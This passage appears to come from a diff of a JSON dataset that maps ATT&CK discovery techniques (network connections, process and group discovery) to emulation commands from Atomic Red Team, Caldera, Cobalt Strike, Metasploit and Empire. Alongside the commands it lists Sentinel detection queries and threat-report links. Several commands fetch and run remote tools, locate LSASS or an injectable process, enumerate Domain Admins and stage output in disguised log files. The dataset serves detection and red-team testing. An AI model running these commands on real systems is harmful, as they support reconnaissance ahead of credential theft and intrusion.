SharpView to get listing of network connections, domains, domain users, and etc.", + "type": "String", + "default": "\"Invoke-ACLScanner\", \"Invoke-Kerberoast\", \"Find-DomainShare\" \n" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sharpview.exe must exist on disk at specified location (#{SharpView})\n", + "prereq_command": "if (Test-Path #{SharpView}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest #{SharpView_url} -OutFile \"#{SharpView}\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "$syntaxList = #{syntax}\nforeach ($syntax in $syntaxList) {\n#{SharpView} $syntax -}\n" + } + } + ] + }, + { + "id": "638fb6bb-ba39-4285-93d1-7e4775b033a8", + "name": "Find System Network Connections", + "description": "Find System Network Connections", + "tactic": "discovery", + "technique": { + "attack_id": "T1049", + "name": "System Network Connections Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "netstat -anto\n" + } + }, + "linux": { + "sh": { + "command": "netstat -anto\n" + } + }, + "windows": { + "psh": { + "command": "netstat -anto;\nGet-NetTCPConnection\n" + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/host/monitortcpconnections", + "ATT&CK Technique #1": "T1049", + "ATT&CK Technique #2": "", + "Technique": "System Network Connections Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/monitortcpconnections\": [\"T1049\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_rdp_session", + "ATT&CK Technique #1": "T1049", + "ATT&CK Technique #2": "", + "Technique": "System Network Connections Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_rdp_session\": [\"T1049\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"or process_path contains \"netstat.exe\")and (process_command_line contains \"*net* use*\"or process_command_line contains \"*net* sessions*\"or process_command_line contains \"*net* file*\"or process_command_line contains \"*netstat*\")or process_command_line contains \"*Get-NetTCPConnection*\"", + "name": "System Network Connections Discovery" + } + ], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1057", + "command_list": [ + "tasklist /v [/svc]\nnet start\nqprocess *", + "ps\nshell tasklist /v [/svc]\nshell net start", + "ps\npost/windows/gather/enum_services", + "ps >> /tmp/loot.txt\nps aux >> /tmp/loot.txt\n", + "tasklist\n", + "Get-Process\n", + "get-wmiObject -class Win32_Process\n", + "wmic process get /format:list\n", + "$ps_url = \"https://download.sysinternals.com/files/PSTools.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"PSTools.zip\" -DestinationPath $staging_folder;\niex $staging_folder\"\\pslist.exe\" >> $env:LOCALAPPDATA\\output.log;\nRemove-Item $download_folder\"PSTools.zip\";\nRemove-Item $staging_folder -Recurse\n", + "acrnctl list\n", + "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\n$valid = foreach($p in $ps) { if($p.Owner -eq $env:USERNAME -And $p.ProcessName -eq \"svchost\") {$p} };\n$valid | ConvertTo-Json\n", + "$ps = get-process | select processname,Id;\n$valid = foreach($p in $ps) { if($p.ProcessName -eq \"lsass\") {$p} };\n$valid | ConvertTo-Json\n", + "ps\n", + "get-process\n", + "ps aux | grep #{host.user.name}\n", + "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\nforeach($p in $ps) {\n if($p.Owner -eq \"#{host.user.name}\") {\n $p;\n }\n}\n", + "get-process >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n", + "Get-Process", + "tasklist", + "ps aux", + "tasklist /m >> $env:APPDATA\\vmtool.log;\ncat $env:APPDATA\\vmtool.log\n", + "powershell/situational_awareness/host/paranoia", + "powershell/situational_awareness/network/powerview/process_hunter" + ], + "commands": [ + { + "command": "tasklist /v [/svc]\nnet start\nqprocess *", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "ps\nshell tasklist /v [/svc]\nshell net start", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "ps\npost/windows/gather/enum_services", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "ps >> /tmp/loot.txt\nps aux >> /tmp/loot.txt\n", + "source": "atomics/T1057/T1057.yaml", + "name": "Atomic Red Team Test - Process Discovery" + }, + { + "command": "tasklist\n", + "source": "atomics/T1057/T1057.yaml", + "name": "Atomic Red Team Test - Process Discovery" + }, + { + "command": "Get-Process\n", + "source": "atomics/T1057/T1057.yaml", + "name": "Atomic Red Team Test - Process Discovery" + }, + { + "command": "get-wmiObject -class Win32_Process\n", + "source": "atomics/T1057/T1057.yaml", + "name": "Atomic Red Team Test - Process Discovery" + }, + { + "command": "wmic process get /format:list\n", + "source": "atomics/T1057/T1057.yaml", + "name": "Atomic Red Team Test - Process Discovery" + }, + { + "command": "$ps_url = \"https://download.sysinternals.com/files/PSTools.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"PSTools.zip\" -DestinationPath $staging_folder;\niex $staging_folder\"\\pslist.exe\" >> $env:LOCALAPPDATA\\output.log;\nRemove-Item $download_folder\"PSTools.zip\";\nRemove-Item $staging_folder -Recurse\n", + "source": "data/abilities/collection/cc191baa-7472-4386-a2f4-42f203f1acfd.yml", + "name": "Process discovery via SysInternals pstool" + }, + { + "command": "acrnctl list\n", + "source": "data/abilities/discovery/0093c0e0-68b6-4cab-b0d4-2b40b3c78f71.yml", + "name": "Enumerate running virtual machines on hypervisor" + }, + { + "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\n$valid = foreach($p in $ps) { if($p.Owner -eq $env:USERNAME -And $p.ProcessName -eq \"svchost\") {$p} };\n$valid | ConvertTo-Json\n", + "source": "data/abilities/discovery/05cda6f6-2b1b-462e-bff1-845af94343f7.yml", + "name": "Discovers processes that the current user has the ability to access and selects an injectable one" + }, + { + "command": "$ps = get-process | select processname,Id;\n$valid = foreach($p in $ps) { if($p.ProcessName -eq \"lsass\") {$p} };\n$valid | ConvertTo-Json\n", + "source": "data/abilities/discovery/0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml", + "name": "Get process info for LSASS" + }, + { + "command": "ps\n", + "source": "data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml", + "name": "Display information about current system processes" + }, + { + "command": "get-process\n", + "source": "data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml", + "name": "Display information about current system processes" + }, + { + "command": "ps aux | grep #{host.user.name}\n", + "source": "data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml", + "name": "Get process info for processes running as a user" + }, + { + "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\nforeach($p in $ps) {\n if($p.Owner -eq \"#{host.user.name}\") {\n $p;\n }\n}\n", + "source": "data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml", + "name": "Get process info for processes running as a user" + }, + { + "command": "get-process >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n", + "source": "data/abilities/discovery/4d9b079c-9ede-4116-8b14-72ad3a5533af.yml", + "name": "Capture running processes via PowerShell" + }, + { + "command": "Get-Process", + "source": "data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml", + "name": "Identify system processes" + }, + { + "command": "tasklist", + "source": "data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml", + "name": "Identify system processes" + }, + { + "command": "ps aux", + "source": "data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml", + "name": "Identify system processes" + }, + { + "command": "tasklist /m >> $env:APPDATA\\vmtool.log;\ncat $env:APPDATA\\vmtool.log\n", + "source": "data/abilities/discovery/8adf02e8-6e71-4244-886c-98c402857404.yml", + "name": "Capture running processes and their loaded DLLs" + }, + { + "command": "powershell/situational_awareness/host/paranoia", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/process_hunter", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1057", + "Built-in Windows Command": "tasklist /v [/svc]\nnet start\nqprocess *", + "Cobalt Strike": "ps\nshell tasklist /v [/svc]\nshell net start", + "Metasploit": "ps\npost/windows/gather/enum_services", + "Description": "Display list of currently running processes and services on the system" + }, + { + "attack_technique": "T1057", + "display_name": "Process Discovery", + "atomic_tests": [ + { + "name": "Process Discovery - ps", + "auto_generated_guid": "4ff64f0b-aaf2-4866-b39d-38d9791407cc", + "description": "Utilize ps to identify processes.\n\nUpon successful execution, sh will execute ps and output to /tmp/loot.txt.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "output_file": { + "description": "path of output file", + "type": "path", + "default": "/tmp/loot.txt" + } + }, + "executor": { + "command": "ps >> #{output_file}\nps aux >> #{output_file}\n", + "cleanup_command": "rm #{output_file}\n", + "name": "sh" + } + }, + { + "name": "Process Discovery - tasklist", + "auto_generated_guid": "c5806a4f-62b8-4900-980b-c7ec004e9908", + "description": "Utilize tasklist to identify processes.\n\nUpon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "tasklist\n", + "name": "command_prompt" + } + }, + { + "name": "Process Discovery - Get-Process", + "auto_generated_guid": "3b3809b6-a54b-4f5b-8aff-cb51f2e97b34", + "description": "Utilize Get-Process PowerShell cmdlet to identify processes.\n\nUpon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout. \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Get-Process\n", + "name": "powershell" + } + }, + { + "name": "Process Discovery - get-wmiObject", + "auto_generated_guid": "b51239b4-0129-474f-a2b4-70f855b9f2c2", + "description": "Utilize get-wmiObject PowerShell cmdlet to identify processes.\n\nUpon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout. \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "get-wmiObject -class Win32_Process\n", + "name": "powershell" + } + }, + { + "name": "Process Discovery - wmic process", + "auto_generated_guid": "640cbf6d-659b-498b-ba53-f6dd1a1cc02c", + "description": "Utilize windows management instrumentation to identify processes.\n\nUpon successful execution, WMIC will execute process to list processes. Output will be via stdout. \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic process get /format:list\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "cc191baa-7472-4386-a2f4-42f203f1acfd", + "name": "SysInternals PSTool Process Discovery", + "description": "Process discovery via SysInternals pstool", + "tactic": "collection", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "$ps_url = \"https://download.sysinternals.com/files/PSTools.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"PSTools.zip\" -DestinationPath $staging_folder;\niex $staging_folder\"\\pslist.exe\" >> $env:LOCALAPPDATA\\output.log;\nRemove-Item $download_folder\"PSTools.zip\";\nRemove-Item $staging_folder -Recurse\n" + } + } + } + }, + { + "id": "0093c0e0-68b6-4cab-b0d4-2b40b3c78f71", + "name": "enumerate VMs", + "description": "Enumerate running virtual machines on hypervisor", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "linux": { + "sh": { + "command": "acrnctl list\n", + "parsers": { + "plugins.stockpile.app.parsers.acrn": [ + { + "source": "hypervisor.vm.name" + } + ] + } + } + } + } + }, + { + "id": "05cda6f6-2b1b-462e-bff1-845af94343f7", + "name": "Discover injectable process", + "description": "Discovers processes that the current user has the ability to access and selects an injectable one", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\n$valid = foreach($p in $ps) { if($p.Owner -eq $env:USERNAME -And $p.ProcessName -eq \"svchost\") {$p} };\n$valid | ConvertTo-Json\n", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "host.process.id", + "custom_parser_vals": { + "json_key": "Id", + "json_type": "int" + } + } + ] + } + } + } + } + }, + { + "id": "0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7", + "name": "Find LSASS", + "description": "Get process info for LSASS", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "$ps = get-process | select processname,Id;\n$valid = foreach($p in $ps) { if($p.ProcessName -eq \"lsass\") {$p} };\n$valid | ConvertTo-Json\n", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "host.process.id", + "custom_parser_vals": { + "json_key": "Id", + "json_type": "int" + } + } + ] + } + }, + "cmd": { + "build_target": "GetLsass.exe", + "language": "csharp", + "code": "using System;\nusing System.Diagnostics;\nusing System.ComponentModel;\n\nnamespace ProcessDump\n{\n class MyProcess\n {\n void GrabLsassProcess()\n {\n Process[] allProc = Process.GetProcessesByName(\"lsass\");\n foreach(Process proc in allProc){\n Console.WriteLine(\"Process: {0} -> PID: {1}\", proc.ProcessName, proc.Id);\n }\n }\n static void Main(string[] args)\n {\n MyProcess myProc = new MyProcess();\n myProc.GrabLsassProcess();\n }\n }\n}\n" + } + } + } + }, + { + "id": "335cea7b-bec0-48c6-adfb-6066070f5f68", + "name": "View Processes", + "description": "Display information about current system processes", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "ps\n" + } + }, + "linux": { + "sh": { + "command": "ps\n" + } + }, + "windows": { + "psh": { + "command": "get-process\n" + } + } + } + }, + { + "id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5a", + "name": "Find user processes", + "description": "Get process info for processes running as a user", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "ps aux | grep #{host.user.name}\n" + } + }, + "linux": { + "sh": { + "command": "ps aux | grep #{host.user.name}\n" + } + }, + "windows": { + "psh": { + "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\nforeach($p in $ps) {\n if($p.Owner -eq \"#{host.user.name}\") {\n $p;\n }\n}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.user.name" + } + ] + } + ] + }, + { + "id": "4d9b079c-9ede-4116-8b14-72ad3a5533af", + "name": "PowerShell Process Enumeration", + "description": "Capture running processes via PowerShell", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "get-process >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n" + } + } + } + }, + { + "id": "5a39d7ed-45c9-4a79-b581-e5fb99e24f65", + "name": "System processes", + "description": "Identify system processes", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Get-Process" + }, + "cmd": { + "command": "tasklist" + }, + "donut_amd64": { + "build_target": "ProcessDump.donut", + "language": "csharp", + "code": "using System;\nusing System.Diagnostics;\nusing System.ComponentModel;\n\nnamespace ProcessDump\n{\n class MyProcess\n {\n void GrabAllProcesses()\n {\n Process[] allProc = Process.GetProcesses();\n foreach(Process proc in allProc){\n Console.WriteLine(\"Process: {0} -> PID: {1}\", proc.ProcessName, proc.Id);\n }\n }\n static void Main(string[] args)\n {\n MyProcess myProc = new MyProcess();\n myProc.GrabAllProcesses();\n }\n }\n}\n" + } + }, + "darwin": { + "sh": { + "command": "ps aux" + } + }, + "linux": { + "sh": { + "command": "ps aux" + } + } + } + }, + { + "id": "8adf02e8-6e71-4244-886c-98c402857404", + "name": "tasklist Process Enumeration", + "description": "Capture running processes and their loaded DLLs", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "tasklist /m >> $env:APPDATA\\vmtool.log;\ncat $env:APPDATA\\vmtool.log\n" + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/host/paranoia", + "ATT&CK Technique #1": "T1057", + "ATT&CK Technique #2": "", + "Technique": "Process Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/paranoia\": [\"T1057\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/process_hunter", + "ATT&CK Technique #1": "T1057", + "ATT&CK Technique #2": "", + "Technique": "Process Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/process_hunter\": [\"T1057\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"tasklist.exe\"or process_command_line contains \"Get-Process\"", + "name": "Process Discovery" + } + ], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://securelist.com/winnti-more-than-just-a-game/37029/", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1069", + "command_list": [ + "net localgroup \"Administrators\"", + "shell net localgroup \"Administrators\"", + "post/windows/gather/local_admin_search_enum", + "net group [\"Domain Admins\"] /domain[:DOMAIN] ", + "net group [\"Domain Admins\"] /domain", + "domain_list_gen.rb\npost/windows/gather/enum_domain_group_users", + "powershell/situational_awareness/host/get_pathacl", + "powershell/situational_awareness/network/powerview/get_object_acl", + "powershell/situational_awareness/network/powerview/map_domain_trust", + "powershell/situational_awareness/host/get_uaclevel" + ], + "commands": [ + { + "command": "net localgroup \"Administrators\"", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell net localgroup \"Administrators\"", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/gather/local_admin_search_enum", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "net group [\"Domain Admins\"] /domain[:DOMAIN] ", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "net group [\"Domain Admins\"] /domain", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "domain_list_gen.rb\npost/windows/gather/enum_domain_group_users", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "powershell/situational_awareness/host/get_pathacl", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_object_acl", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/map_domain_trust", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/host/get_uaclevel", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1069", + "Built-in Windows Command": "net localgroup \"Administrators\"", + "Cobalt Strike": "shell net localgroup \"Administrators\"", + "Metasploit": "post/windows/gather/local_admin_search_enum", + "Description": "Display the list of local administrator 